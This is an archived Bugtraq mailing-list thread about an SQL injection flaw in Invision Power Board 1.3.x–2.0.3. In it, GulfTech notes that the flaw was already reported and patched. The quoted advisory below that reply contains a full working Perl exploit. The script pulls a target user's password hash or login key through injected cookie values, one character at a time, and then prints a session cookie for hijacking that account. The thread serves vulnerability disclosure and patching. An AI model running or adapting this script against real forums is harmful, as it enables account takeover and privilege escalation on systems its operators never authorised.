Bugtraq mailing list archives
Re: [HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch
From: GulfTech Security Research <security () gulftech org>
Date: Sun, 17 Jul 2005 11:24:29 -0500
Hello,I am writing to clear up any confusion here for both the end users and the readers.
1) This vulnerability was discovered by me (James Bercegay), reported, and fixed several months ago. 2) If you have applied the necessary Invision Power Board updates as outlined here
http://forums.invisionpower.com/index.php?showtopic=168016Then you are 100% immune to this "exploit" :) Indeed this only affects 2.0.3 and earlier.
3) I believe this is the link to the real BID for this issue http://www.securityfocus.com/bid/13529I have no idea how the confusion came about in regards to this issue, but hopefully this clears up any questions the Invision Power Board users reading this post may have.
Regards, JamesP.S. Yes, it does seem agustus00 was right when he said the exploit code was copied. http://downloads.securityfocus.com/vulnerabilities/exploits/invision_sql_poc.pl
zinho () hackerscenter com wrote:
Hackers Center Security Group (http://www.hackerscenter.com/) Zinho's Security Advisory Desc: Invision PowerBoard 1.3.x - 2.x Privilege escalation through SQL injection Risk: High hacky0u from http://www.h4cky0u.org kindly reported to me an exploit working against 1.3.x and 2.x versions of Invision Power board. I've coded a quickfix to patch it: http://www.hackerscenter.com/archive/view.asp?id=3812 This is the exploit (Full credit to h4cky0u for it): #!/usr/bin/perl -w ################################################################## # This one actually works :) Just paste the outputted cookie into # your request header using livehttpheaders or something and you # will probably be logged in as that user. No need to decrypt it! # Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org ################################################################## use LWP::UserAgent; $ua = new LWP::UserAgent; $ua->agent("Mosiac 1.0" . $ua->agent); if (!$ARGV[0]) {$ARGV[0] = '';} if (!$ARGV[3]) {$ARGV[3] = '';} my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin'; my $user = $ARGV[1]; # userid to jack my $iver = $ARGV[2]; # version 1 or 2 my $cpre = $ARGV[3]; # cookie prefix my $dbug = $ARGV[4]; # debug? if (!$ARGV[2]) { print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2]. "; exit; } my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"); my $outputs = ''; for( $i=1; $i < 33; $i++ ) { for( $j=0; $j < 16; $j++ ) { my $current = $charset[$j]; my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*"; my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql); my $res = $ua->get($path, @cookie); # If we get a valid sql request then this # does not appear anywhere in the sources $pattern = '<title>(.*)Log In(.*)</title>'; $_ = $res->content; if ($dbug) { print }; if ( !(/$pattern/) ) { $outputs .= $current; print "$current "; last; } } if ( length($outputs) < 1 ) { print "Not Exploitable! "; exit; } } print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs; exit; # www.h4cky0u.org
Current thread:
- [HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch zinho (Jul 16)
- Re: [HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch milw0rm Inc. (Jul 16)
- Re: [HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch GulfTech Security Research (Jul 18)
- <Possible follow-ups>
- Re: [HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch augustusx00 (Jul 16)
- Re: Re: [HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch [at] (Jul 21)